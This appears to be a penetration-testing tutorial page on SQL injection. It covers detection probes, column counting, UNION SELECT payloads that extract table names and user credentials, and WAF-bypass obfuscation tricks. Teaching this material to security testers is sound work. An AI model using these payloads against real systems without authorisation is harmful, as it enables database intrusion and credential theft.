SQL Injection Testing: From Detection to Data Extraction
SQL Injection (SQLi) is one of the most impactful vulnerabilities a tester can find. It can lead to data theft, authentication bypass, and in some cases, remote code execution. This guide walks through the complete SQLi testing methodology.
| Technique | Database | Detection Method | Risk |
|---|---|---|---|
| UNION-based | MySQL, PostgreSQL, MSSQL | Error messages, column count | Critical |
| Boolean-based Blind | All | Response length/content diff | High |
| Time-based Blind | All | Response delay (SLEEP/WAITFOR) | High |
| Error-based | MySQL, MSSQL, Oracle | Error messages in response | Critical |
| Out-of-Band | MySQL, MSSQL, Oracle | DNS/HTTP callbacks | Critical |
| Stacked Queries | MSSQL, PostgreSQL | Second query execution | Critical |
| Second Order | All | Stored then executed later | High |
Step 1: Detection
Before extracting data, you need to confirm the injection point. Start with these probes:
Boolean-Based Detection
' AND 1=1-- (true condition - normal response)
' AND 1=2-- (false condition - different response)
If the responses differ, you likely have a boolean-based SQLi.
Time-Based Detection
' AND SLEEP(5)-- (MySQL)
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
' AND pg_sleep(5)-- (PostgreSQL)
If the response is delayed by 5 seconds, time-based blind SQLi is confirmed.
Error-Based Detection
' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))-- (MySQL)
' AND 1=CAST(version() AS int)-- (PostgreSQL)
' AND 1=CONVERT(int,@@version)-- (MSSQL)
Step 2: Determine Column Count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (until error)
Or use UNION with NULLs:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Step 3: Extract Data
Once you know the column count, extract data using UNION SELECT:
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--
Database-Specific Cheat Sheet
Each database has unique syntax. Use our SQL Injection Generator to auto-generate payloads for MySQL, PostgreSQL, MSSQL, Oracle, and SQLite. See the full SQL Injection Cheat Sheet for 70+ payloads.
WAF Bypass Techniques
When a WAF blocks your payloads, try:
- Inline comments:
/*!UNION*/ /*!SELECT*/ - Case variation:
uNiOn SeLeCt - URL encoding:
%55NION %53ELECT - Newline injection:
UNION%0ASELECT
Our WAF Bypass Generator can automatically apply these techniques to any payload. You can also chain WAF bypass encoding with the Encoding Pipeline for multi-layer obfuscation.
Related Reading
SQL injection is frequently chained with other attacks. Use Command Injection payloads when SQLi leads to OS command execution (e.g., via xp_cmdshell in MSSQL). For NoSQL databases like MongoDB, see our NoSQL Injection Generator instead. Explore our SSRF Exploitation Guide to learn how SQLi can enable server-side request forgery, or read the XSS Payloads Guide for second-order attacks where SQL-injected data triggers XSS.
Put this into practice
Generate and test these payloads interactively — free, in your browser.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides